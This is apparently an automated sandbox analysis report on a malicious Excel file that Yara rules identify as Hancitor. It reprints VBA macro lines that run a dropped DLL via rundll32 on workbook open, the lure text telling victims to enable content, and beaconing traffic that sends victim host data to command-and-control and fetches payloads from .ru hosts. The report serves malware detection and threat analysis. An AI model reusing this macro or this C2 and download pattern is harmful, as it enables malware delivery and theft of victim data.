                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_00341FE0 InternetCrackUrlA,InternetConnectA,HttpOpenRequestA,InternetCloseHandle,InternetQueryOptionA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3ECECA93.emf
                  Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Accept: */* | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: api.ipify.org | Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: GET /7hsjfd9w4refsd.exe HTTP/1.1 | Accept: */* | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: s0lom0n.ru | Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: GET /?format=xml HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: api.ipify.org | Connection: Keep-Alive
                  Source: svchost.exe, 00000007.00000002.2132921997.000000000022B000.00000004.00000020.sdmp | String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
                  Source: rundll32.exe, 00000004.00000002.2348635367.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349163400.0000000002130000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                  Source: svchost.exe, 00000007.00000002.2132921997.000000000022B000.00000004.00000020.sdmp | String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
                  Source: unknown | DNS traffic detected: queries for: api.ipify.org
                  Source: unknown | HTTP traffic detected: POST /8/forum.php HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: tholeferli.com | Content-Length: 110 | Cache-Control: no-cache | Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 | Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: rundll32.exe, 00000005.00000002.2348826017.00000000005AC000.00000004.00000020.sdmp | String found in binary or memory: http://aidgodown.ru/8/forum.php
                  Source: rundll32.exe | String found in binary or memory: http://api.ipify.org
                  Source: svchost.exe, 00000007.00000002.2132894094.00000000001F4000.00000004.00000020.sdmp | String found in binary or memory: http://api.ipify.org/?format=xml
                  Source: rundll32.exe, 00000005.00000003.2121584965.00000000001D0000.00000040.00000001.sdmp, rundll32.exe, 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp | String found in binary or memory: http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID
                  Source: rundll32.exe, 00000004.00000002.2348635367.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349163400.0000000002130000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
                  Source: rundll32.exe, 00000004.00000002.2348635367.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349163400.0000000002130000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
                  Source: rundll32.exe, 00000004.00000002.2349091460.0000000001D07000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349407298.0000000002317000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
                  Source: rundll32.exe, 00000004.00000002.2349091460.0000000001D07000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349407298.0000000002317000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                  Source: rundll32.exe, 00000005.00000002.2348826017.00000000005AC000.00000004.00000020.sdmp | String found in binary or memory: http://relifleappin.ru/8/forum.php
                  Source: rundll32.exe, 00000005.00000002.2349914383.0000000003050000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                  Source: rundll32.exe, 00000004.00000002.2349091460.0000000001D07000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349407298.0000000002317000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                  Source: rundll32.exe, 00000005.00000002.2348826017.00000000005AC000.00000004.00000020.sdmp, rundll32.exe, 00000005.00000002.2348733440.000000000051D000.00000004.00000020.sdmp | String found in binary or memory: http://tholeferli.com/8/forum.php
                  Source: rundll32.exe, 00000005.00000002.2348788273.0000000000553000.00000004.00000020.sdmp | String found in binary or memory: http://tholeferli.com/8/forum.phponnect
                  Source: rundll32.exe, 00000004.00000002.2349091460.0000000001D07000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349407298.0000000002317000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                  Source: rundll32.exe, 00000005.00000002.2349914383.0000000003050000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
                  Source: rundll32.exe, 00000004.00000002.2348635367.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349163400.0000000002130000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
                  Source: rundll32.exe, 00000004.00000002.2349091460.0000000001D07000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349407298.0000000002317000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
                  Source: rundll32.exe, 00000004.00000002.2348635367.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349163400.0000000002130000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
                  Source: rundll32.exe, 00000005.00000002.2349163400.0000000002130000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.

                  System Summary:

                  Malicious sample detected (through community Yara rule)
                  Source: 5.3.rundll32.exe.1d438c.0.raw.unpack, type: UNPACKEDPE | Matched rule: Hancitor Payload Author: kevoreilly
                  Source: 5.3.rundll32.exe.1d438c.0.unpack, type: UNPACKEDPE | Matched rule: Hancitor Payload Author: kevoreilly
                  Source: 5.2.rundll32.exe.340000.0.unpack, type: UNPACKEDPE | Matched rule: Hancitor Payload Author: kevoreilly
                  Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                  Source: Screenshot number: 4 | Screenshot OCR: Enable editing button from the yellow bar above 19 ' Once you have enabled editing, please click
                  Source: Screenshot number: 4 | Screenshot OCR: Enable content button 21 ,, from the yellow bar above 23 24 25 26 27 28 29 30 31 32 ::(
                  Document contains OLE streams with PE executables
                  Source: 0722_2857746751.xls | Stream path 'MBD0132A5F4/\x1Ole10Native' : MZ signature found
                  Document contains an embedded VBA macro which may execute processes
                  Source: 0722_2857746751.xls | OLE, VBA macro line: Private Declare PtrSafe Function fffz Lib "shell32" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
                  Document contains an embedded VBA macro with suspicious strings
                  Source: 0722_2857746751.xls | OLE, VBA macro line: Name pafs As Environ$("temp") & "\" & "omsh.dll"
                  Source: 0722_2857746751.xls | OLE, VBA macro line: Private Declare PtrSafe Function fffz Lib "shell32" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
                  Source: 0722_2857746751.xls | OLE, VBA macro line: vcbc = Environ$("temp")
                  Source: 0722_2857746751.xls | OLE, VBA macro line: fffz 0, vbNullString, "rundl" & "l32", Environ$("temp") & "\omsh.dll,SHIIJGLGNAB", vbNullString, 1
                  Source: 0722_2857746751.xls | OLE, VBA macro line: usx = Environ$("temp")
                  Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function nam, String environ: Name pafs As Environ$("temp") & "\" & "omsh.dll" | Name: nam
                  Source: VBA code instrumentation | OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, String environ: vcbc = Environ$("temp") | Name: Workbook_Open
                  Source: VBA code instrumentation | OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, String environ: fffz 0, vbNullString, "rundl" & "l32", Environ$("temp") & "\omsh.dll,SHIIJGLGNAB", vbNullString, 1 | Name: Workbook_Open
                  Source: VBA code instrumentation | OLE, VBA macro: Module ThisWorkbook, Function xxx, String environ: usx = Environ$("temp") | Name: xxx
                  Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
                  Source: 0722_2857746751.xls | Stream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions exec, run, environ
                  Office process drops PE file
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\532.dll
                  Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
                  Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
                  Source: C:\Windows\SysWOW64\svchost.exe | Memory allocated: 76E20000 page execute and read and write
                  Source: C:\Windows\SysWOW64\svchost.exe | Memory allocated: 76D20000 page execute and read and write
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_004293B0: GetFileInformationByHandle,DeviceIoControl
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0034E000
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_003534B0
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0035639C
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0040E85F
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00415800
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0040F9C0
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_004122DD
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_004220F8
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00425141
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0042D972
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0042F101
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_004261C4
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_004221DF
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00430268
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0040727F
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0042FA0C
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0040B2F3
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0042FB2C
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00432BF4
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0040A3A4
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0042F445
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00420408
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00430C08
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_004314CB
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00409CE5
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0042E4B7
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0042057D
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00414506
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00406D10
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00430523
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0042DDCA
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00409DD8
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0042FE02
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00430E22
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00432E3A
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0042E6E2
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0042EEA0
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0040A71A
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0042EFC5
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0040BFEF
                  Source: 0722_2857746751.xls | OLE, VBA macro line: Private Sub Workbook_Open()
                  Source: VBA code instrumentation | OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open | Name: Workbook_Open
                  Source: 0722_2857746751.xls | OLE indicator, VBA macros: true
                  Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\532.dll 8EFAC1531E83525BB0806EEBCA0BB9A797A18FEB1848A4CEEE4A88FDB85CBBBD
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 0034DFA0 appears 41 times
                  Source: C:\Windows\System32\IME\IMEJP10\imjppdmg.exe | Section loaded: imjp12k.dll
                  Source: 5.3.rundll32.exe.1d438c.0.raw.unpack, type: UNPACKEDPE | Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
                  Source: 5.3.rundll32.exe.1d438c.0.unpack, type: UNPACKEDPE | Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
                  Source: 5.2.rundll32.exe.340000.0.unpack, type: UNPACKEDPE | Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
                  Source: rundll32.exe, 00000004.00000002.2348635367.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349163400.0000000002130000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
                  Source: classification engine | Classification label: mal100.phis.troj.spyw.expl.evad.winXLS@9/7@7/5
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00415800 CreateMutexA,LoadLibraryA,URLDownloadToFileA,LoadLibraryA,GetComputerNameW,GetSystemInfo,GlobalMemoryStatusEx,GetTimeZoneInformation,GetLocaleInfoW,CreateToolhelp32Snapshot,Process32First,Process32Next,RegOpenKeyExW,RegEnumKeyExW,RegOpenKeyExW
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Roaming\Microsoft\IMJP10
                  Source: C:\Windows\System32\IME\IMEJP10\imjppdmg.exe | Mutant created: \Sessions\1\BaseNamedObjects\{6597B945-4806-49df-9D96-BABAB5D250A7}
                  Source: C:\Windows\SysWOW64\svchost.exe | Mutant created: \Sessions\1\BaseNamedObjects\serhershesrhsfesrf
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRCD5C.tmp
                  Source: 0722_2857746751.xls | OLE indicator, Workbook stream: true
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
                  Source: C:\Windows\System32\IME\IMEJP10\imjppdmg.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB
                  Source: 0722_2857746751.xls | Virustotal: Detection: 29%
                  Source: 0722_2857746751.xls | ReversingLabs: Detection: 22%
                  Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\IME\IMEJP10\imjppdmg.exe /Migration
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB
                  Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB
                  Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\IME\IMEJP10\imjppdmg.exe /Migration
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB
                  Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB
                  Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
                  Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32
                  Source: Window Recorder | Window detected: More than 3 window changes detected
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                  Source: Binary string: c:\Star\danger\Air_Night\recei\Paragraph.pdb source: rundll32.exe, 00000005.00000002.2348584640.0000000000359000.00000002.00020000.sdmp, 0722_2857746751.xls
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_00343580 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0034C6F3 push ecx; ret 5_2_0034C706
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0034DFE5 push ecx; ret 5_2_0034DFF8
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0036F992 push ecx; retf 5_2_0036F993
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00435E20 push dword ptr [eax+04h]; ret 7_2_00435E4F
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\532.dll
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
